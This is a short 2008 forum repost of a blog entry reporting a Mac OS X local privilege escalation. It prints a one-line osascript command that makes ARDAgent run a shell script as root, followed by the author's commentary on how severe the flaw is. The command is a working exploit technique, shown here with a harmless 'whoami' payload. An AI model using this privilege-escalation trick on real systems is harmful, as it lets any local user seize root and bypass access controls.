The Artima Developer Community
Sponsored Link

Java Buzz Forum
Apple gets Pwned

0 replies on 1 page.

Welcome Guest
  Sign In

Go back to the topic listing  Back to Topic List Click to reply to this topic  Reply to this Topic Click to search messages in this forum  Search Forum Click for a threaded view of the topic  Threaded View   
Previous Topic   Next Topic
Flat View: This topic has 0 replies on 1 page
Elliotte Rusty Harold

Posts: 1573
Nickname: elharo
Registered: Apr, 2003

Elliotte Rusty Harold is an author, developer, and general kibitzer.
Apple gets Pwned Posted: Jun 18, 2008 7:55 PM
Reply to this message Reply

This post originated from an RSS feed registered with Java Buzz by Elliotte Rusty Harold.
Original Post: Apple gets Pwned
Feed Title: Mokka mit Schlag
Feed URL: http://www.elharo.com/blog/feed/atom/?
Feed Description: Ranting and Raving
Latest Java Buzz Posts
Latest Java Buzz Posts by Elliotte Rusty Harold
Latest Posts From Mokka mit Schlag

Advertisement
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
root

Wow. A one line script that allows any logged in user to grab root, not even a buffer overflow or third party software involved. This is movie plot hacking at its finest. I haven’t seen an attack this bad in years.

The only thing I would imagine that could be worse would be if you could execute this attack remotely.

Read: Apple gets Pwned

Topic: Sun Releases Java Composite Application Platform Suite (Java Caps) 6 Previous Topic   Next Topic Topic: Mac OS X 10.6 Snow Leopard Requires Intel Processor

Sponsored Links



Google
  Web Artima.com   

Copyright © 1996-2019 Artima, Inc. All Rights Reserved. - Privacy Policy - Terms of Use